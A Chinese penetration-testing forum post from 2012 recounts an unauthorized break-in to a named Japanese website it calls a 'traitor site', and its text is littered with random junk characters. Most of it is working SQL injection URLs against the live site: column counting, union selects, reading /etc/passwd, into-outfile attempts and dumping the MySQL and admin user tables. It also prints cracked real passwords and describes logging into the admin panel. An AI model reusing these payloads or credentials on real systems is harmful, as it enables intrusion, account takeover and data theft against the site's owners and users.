中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试

1 n- F( l2 M4 A: g% |" ~7 A9 {& W- [0 ~" L! F+ ?( i9 N/ a" h
0x01. 检测 www.zuaa.jp 收集数据. l' F  c& ]4 t6 s- E6 S1 {
[attach]73[/attach]
. X( x- Q, M* c9 T
2 C4 P7 G; t% c$ jwhatweb) a# M# y) C% Y. B% d
[attach]74[/attach]
- v" {2 j2 G" y) @0 Y
/ ]: f: a3 B! h2 q! y! D# `( S& e  y利用NMAP扫描0 v7 E; |' r5 G' N' f, A
[attach]75[/attach]/ j, u# G1 j6 n1 F2 _
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持5 M/ i$ {6 ~+ [/ \# X7 _
0x02.找注入点5 `6 s, T1 ]& P1 U" [7 k0 y
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3906 C$ x( u/ U" V+ H- T2 E
[attach]76[/attach]) E, O: A) w( i' A! g5 t

- M: l/ F& M& N) M0x03.order by
, e  E: ?8 r3 t6 b( v& k             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1* j; G! v4 y# {+ t8 m$ S
[attach]77[/attach]: Z1 o( C7 X( `4 K; e- D1 o; E. J4 _
order by 28报错,order by 27正常! w6 `4 j! {  t6 N( G9 A( k9 c) O

4 h2 A* G4 |: T6 d8 e5 g0x04.   union手动查询7 M, O: U- F( l' a
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 3 f- w! r& A9 t  c6 }, W9 ^9 Y. F
添加到 27 时正常显示
4 [/ d. Y, n5 c[attach]78[/attach]6 u) Q& n. H. u+ a/ V+ C6 b: r
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持) j% ~' O/ s( s$ ?

/ m, C* }. D: f9 q' S0x05. info:% E% e) E* e/ X5 I8 f1 t
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
1 b* D* I" J  w$ @* O[attach]79[/attach]$ T  b, {' y& K& V9 V2 G4 l
user:            root@localhost/ d% U) X. A  k" X2 v
database:    openpne) o( g9 L$ `6 s& q
version:      4.1.22
5 r% ~9 d) J, o1 b( e0 w" y+ wos:             portbld-freebsd5.4
; U, ^+ B. S  V
5 ~6 n9 E! \1 Z; }7 t9 t, F0x06. root用户6 N) g8 h( S9 }  D* K
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
( p: m4 ?$ i& Z$ D3 n" P; g5 Khttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 4 K% F: B6 }0 B% `! L) W
[attach]80[/attach]9 U5 i6 S9 n8 X9 `8 }
通过工具转换
2 F& @  y. b3 f/ [; m, U; }3 z[attach]81[/attach]
& S8 i! f, g/ R. }6 ]- B2 N" w中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
% e% v/ W: l4 s. @1 l. P* \' d/ Y- h# }2 c
0x07. 利用 into outfile: h( T% [* T$ L8 D9 z
全部都失败& Q; d& U# L& \0 a  o
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
% _0 b; L7 d( W; t  n% \7 F( T3 Y' k2 ]6 X% H- s2 ^
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 2 a' a, U& G* M3 R

. o* e1 m. y" o- w" V6 ?) Y7 ~页面显示“MDB2 Error:syntax error”8 V  P" i' ^) n7 B) U" y

* N! v$ c! u$ U+ S5 G0x08. 利用 mysql 4.1+ F. ?% \4 K0 T- W% i" [* I
猜常规表名,字段未果 工具 sqlmap
1 V6 O) e: `% E7 X$ }中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持+ I9 x0 I# }* D' v, G2 s; S9 R
3 t2 I1 x- j7 p4 M+ l, ~3 u
[attach]82[/attach]: y) z2 I/ k% s$ F  O6 e  c
0 R2 b% x" w) I4 z$ W7 m
0x09. 查找后台
: M. y/ H' e! J5 L7 c8 K+ o利用 现有的各种 后台工具尝试都不行
6 z+ a& `. h3 u
$ b5 }. X  L7 Y! b0x10.  MySL外联方法
" F; ]: g1 L. U& l从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
9 o$ u( K( v7 P1 K) g$ _2 {. M可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user: g) @6 ^; a" d  }8 Z  w  b& a
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user3 X7 C) j. N- k2 G: b7 c  J) ~) C
[attach]83[/attach]
$ t0 [3 b5 H8 s5 B4 @这个可以在 www.cmd5.com 解密' [8 k0 A! _4 N8 m! M3 q5 P3 a% F
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009* R& j# G& z6 G2 ?7 w1 G4 l* z
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
8 i, j/ J9 g, H# A5 `! Z1 Qopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???2 f8 C0 A! o! A: o
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
- g; D" I5 R: J" g工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
7 _/ L" m- ^% |[attach]84[/attach]; e( N+ a9 X9 T7 \& p
4 _$ E# c) r1 v9 T' Q
0x11. 网站突破# F3 N1 @. A4 `" L+ K3 ]
发现网站的源程序 openpne, google 下载 openpne 源码
/ e6 ^- F9 ]& j+ X[attach]85[/attach]
/ B3 M4 f) v8 n, a8 c
3 c! `8 q  l0 h- d0 \) w0x12. 默认信息利用+ N  w, W  a+ H4 ?5 i6 P& \: ^
http://sns.zuaa.jp/?m=admin&a=page_login
7 c$ ^9 f& |% e2 [5 |2 J3 }[attach]86[/attach]$ m, B7 u6 B1 P( @8 p$ w( ^. d
表名 (c_admin_user) ,字段名(username,password)
/ M7 W6 L# K$ G0 Khttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
8 @! ]! Z) V  B" S& |$ O- r5 l[attach]87[/attach]
3 u; L2 A& U! U' n& Y解密
) Q8 e; I; W4 P9 l- g8 |zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
1 P, ^& p( u7 R7 R# Dzuaajp:c0923ec5857796a393da99905008c176,          zju1897  n* R* Y9 S- K+ C/ D. @

* E2 q% U1 d+ U, Z% Z% t0 D中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
: D; c1 w# J) h7 m/ c2 M. s% [8 D" {% M
0x13. 登录后台5 r9 Z" A. h4 N6 W' x* Z6 c, `: L$ f* U, `
[attach]88[/attach]5 |: s  N9 j# j7 A: O5 [# o( a% A' _% d

, @& w3 o# G4 c4 B( R& h4 z3 _
$ n, x5 ]0 s* Z. Z. y0x14. 小结
9 V) A. y; C+ r9 j! F9 W. @( j1 S利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。5 ]8 b! D/ t6 H
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点' o1 ?3 n' U( o: E% }- j
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain. I) F5 r' X$ |% N7 o( \! K- U% v
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
% ~: X: [( ]$ H: r8 D4 \
' I4 F+ J8 \7 J, G; n最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!  J2 a& _8 B6 b: _, ]8 q& @

作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2